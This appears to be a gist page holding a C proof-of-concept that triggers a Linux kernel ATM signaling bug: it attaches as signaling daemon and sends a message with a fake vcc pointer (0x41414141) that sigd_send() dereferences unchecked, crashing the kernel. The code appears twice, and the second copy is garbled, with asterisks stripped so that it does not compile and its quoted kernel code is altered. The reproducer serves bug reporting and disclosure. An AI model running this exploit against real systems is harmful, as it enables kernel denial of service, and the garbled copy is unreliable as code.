mrpre · February 5, 2026 08:56
diff --git a/gistfile1.txt b/gistfile1.txt
 /*
 * Reproducer for ATM signaling sigd_send() vulnerability
 *
 * Bug: net/atm/signaling.c sigd_send() uses user-controlled
 * msg->vcc pointer without validation.
 *
 * Requires: root (CAP_NET_ADMIN) and CONFIG_ATM enabled kernel
 */
 #include <stdio.h>
 #include <string.h>
 #include <unistd.h>
 #include <sys/socket.h>
 #include <sys/types.h>
 #include <sys/ioctl.h>
 #include <linux/atm.h>
 #include <linux/atmsvc.h>

 #ifndef AF_ATMSVC
 #define AF_ATMSVC 9
 #endif

 int main(void)
 {
 	int fd;
 	struct msghdr msg = {0};
 	struct iovec iov;
 	char buf[512] = {0};

 	/* Create ATM SVC socket */
 	fd = socket(AF_ATMSVC, SOCK_DGRAM, 0);
 	if (fd < 0) {
 		perror("socket(AF_ATMSVC)");
 		return 1;
 	}

 	/* Attach as signaling daemon - requires CAP_NET_ADMIN */
 	if (ioctl(fd, ATMSIGD_CTRL) < 0) {
 		perror("ioctl(ATMSIGD_CTRL)");
 		close(fd);
 		return 1;
 	}

 	/*
 	 * struct atmsvc_msg layout:
 	 *   offset 0:  enum atmsvc_msg_type type (4 bytes)
 	 *   offset 4:  atm_kptr_t vcc (8 bytes on 64-bit)
 	 *
 	 * sigd_send() reads msg->vcc from user data and dereferences
 	 * it directly without validation:
 	 *   vcc = *(struct atm_vcc **) &msg->vcc;
 	 *   sk = sk_atm(vcc);  // BOOM!
 	 */
 	*(int *)(buf + 0) = 6;              /* as_okay */
 	*(unsigned long *)(buf + 4) = 0x41414141;  /* fake vcc pointer */

 	iov.iov_base = buf;
 	iov.iov_len = sizeof(buf);

 	msg.msg_iov = &iov;
 	msg.msg_iovlen = 1;

 	printf("Sending malicious message with fake vcc=0x41414141...\n");
 	sendmsg(fd, &msg, 0);

 	close(fd);
 	return 0;
 }
	/*
	* Reproducer for ATM signaling sigd_send() vulnerability
	*
	* Bug: net/atm/signaling.c sigd_send() uses user-controlled
	* msg->vcc pointer without validation.
	*
	* Requires: root (CAP_NET_ADMIN) and CONFIG_ATM enabled kernel
	*/
	#include <stdio.h>
	#include <string.h>
	#include <unistd.h>
	#include <sys/socket.h>
	#include <sys/types.h>
	#include <sys/ioctl.h>
	#include <linux/atm.h>
	#include <linux/atmsvc.h>

	#ifndef AF_ATMSVC
	#define AF_ATMSVC 9
	#endif

	int main(void)
	{
	int fd;
	struct msghdr msg = {0};
	struct iovec iov;
	char buf[512] = {0};

	/* Create ATM SVC socket */
	fd = socket(AF_ATMSVC, SOCK_DGRAM, 0);
	if (fd < 0) {
	perror("socket(AF_ATMSVC)");
	return 1;
	}

	/* Attach as signaling daemon - requires CAP_NET_ADMIN */
	if (ioctl(fd, ATMSIGD_CTRL) < 0) {
	perror("ioctl(ATMSIGD_CTRL)");
	close(fd);
	return 1;
	}

	/*
	* struct atmsvc_msg layout:
	* offset 0: enum atmsvc_msg_type type (4 bytes)
	* offset 4: atm_kptr_t vcc (8 bytes on 64-bit)
	*
	* sigd_send() reads msg->vcc from user data and dereferences
	* it directly without validation:
	* vcc = (struct atm_vcc *) &msg->vcc;
	* sk = sk_atm(vcc); // BOOM!
	*/
	(int )(buf + 0) = 6; /* as_okay */
	(unsigned long )(buf + 4) = 0x41414141; /* fake vcc pointer */

	iov.iov_base = buf;
	iov.iov_len = sizeof(buf);

	msg.msg_iov = &iov;
	msg.msg_iovlen = 1;

	printf("Sending malicious message with fake vcc=0x41414141...\n");
	sendmsg(fd, &msg, 0);

	close(fd);
	return 0;
	}
No results found